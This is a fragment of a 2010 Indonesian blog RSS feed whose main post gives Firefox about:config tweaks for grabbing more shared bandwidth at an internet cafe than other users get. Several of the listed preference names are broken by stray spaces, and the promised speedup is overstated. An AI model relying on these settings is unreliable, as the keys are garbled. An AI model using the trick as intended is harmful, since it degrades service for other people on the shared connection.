<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/adiepseptian.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/adiepseptian.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/adiepseptian.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/adiepseptian.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/adiepseptian.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/adiepseptian.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/adiepseptian.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/adiepseptian.wordpress.com/18/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=18&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://adiepseptian.wordpress.com/2010/01/07/bagaimana-orang-kaya-menciptakan-uang/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d927bc092f07611747b893b634fab31b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">adiepseptian</media:title>
		</media:content>
	</item>
		<item>
		<title>Cara Sedot Bandwith di warnet dengan Modzilla</title>
		<link>http://adiepseptian.wordpress.com/2010/01/04/cara-sedot-bandwith-di-warnet-dengan-modzilla/</link>
		<comments>http://adiepseptian.wordpress.com/2010/01/04/cara-sedot-bandwith-di-warnet-dengan-modzilla/#comments</comments>
		<pubDate>Mon, 04 Jan 2010 11:54:45 +0000</pubDate>
		<dc:creator>adiepseptian</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://adiepseptian.wordpress.com/?p=7</guid>
		<description><![CDATA[Jika sebelumnya saya posting tentang cara mempercepat koneksi di internet dengan Putty,maka untuk saat ini saya aka posting tentang bagaimana caranya mempercepat kecepatan internet dengan cara sedot bandwith.Jikaanda sering berkunjung ke warnet dan merasakan koneksi yang lambat, ikuti trik berikut ini agar koneksi anda lebih cepat dibanding user yang lain. Dengan sedikit setting pada Browser [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=7&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://1.bp.blogspot.com/_2_MbDmZ45ec/SRlvgn0PTEI/AAAAAAAAADk/bEiZua5cwuw/s1600-h/moz.jpg"><img style="float:left;cursor:pointer;width:110px;height:109px;margin:0 10px 10px 0;" src="http://1.bp.blogspot.com/_2_MbDmZ45ec/SRlvgn0PTEI/AAAAAAAAADk/bEiZua5cwuw/s200/moz.jpg" border="0" alt="" /></a>Jika sebelumnya saya posting tentang cara mempercepat koneksi di internet dengan Putty,maka untuk saat ini saya aka posting tentang bagaimana caranya mempercepat kecepatan internet dengan cara sedot bandwith.Jikaanda sering berkunjung ke warnet dan merasakan koneksi yang lambat, ikuti trik berikut ini agar koneksi anda lebih cepat dibanding user yang lain. Dengan sedikit setting pada Browser Mozilla anda dapat melakukan hal tersebut, ikuti petunjuk dibawah ini :</p>
<p>Install Mozilla Firefox<br />
Ketik, “about:config” di Addresse bar (URL) trus ENTER. Ini akan<br />
membawa anda ke menu parameters Firefox.<br />
Klik 2x di settingan dan masukkan angka-angka ini &#8211; untuk true / false<br />
booleans &#8211; mereka bakal ganti otomatis begitu klik 2x<br />
Code:<br />
browser.tabs. showSingleWindow ModePrefs &#8211; true<br />
network.http. max-connections &#8211; 64<br />
network.http. max-connections- per-server &#8211; 20<br />
network.http. max-persistent- connections- per-proxy &#8211; 10<br />
network.http. max-persistent- connections- per-server &#8211; 4<br />
network.http. pipelining &#8211; true<br />
network.http. pipelining. maxrequests &#8211; 100<br />
network.http. proxy.pipelining &#8211; true<br />
network.http. request.timeout &#8211; 300<br />
nglayout.initialpai nt.delay = 0<br />
network.http. request.max- start-delay = 0</p>
<p>Tutup mozilla trus jalanin lagi.<br />
Sekarang Mozilla anda lebih GILAA! !!.</p>
<p>NB : jangan sering-sering pakai cara ini ya???Kasihan tuh nanti orang lain yang mau internet.Jadinya kan lemot.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/adiepseptian.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/adiepseptian.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/adiepseptian.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/adiepseptian.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/adiepseptian.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/adiepseptian.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/adiepseptian.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/adiepseptian.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=7&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://adiepseptian.wordpress.com/2010/01/04/cara-sedot-bandwith-di-warnet-dengan-modzilla/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d927bc092f07611747b893b634fab31b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">adiepseptian</media:title>
		</media:content>

		<media:content url="http://1.bp.blogspot.com/_2_MbDmZ45ec/SRlvgn0PTEI/AAAAAAAAADk/bEiZua5cwuw/s200/moz.jpg" medium="image" />
	</item>
	</channel>
</rss>
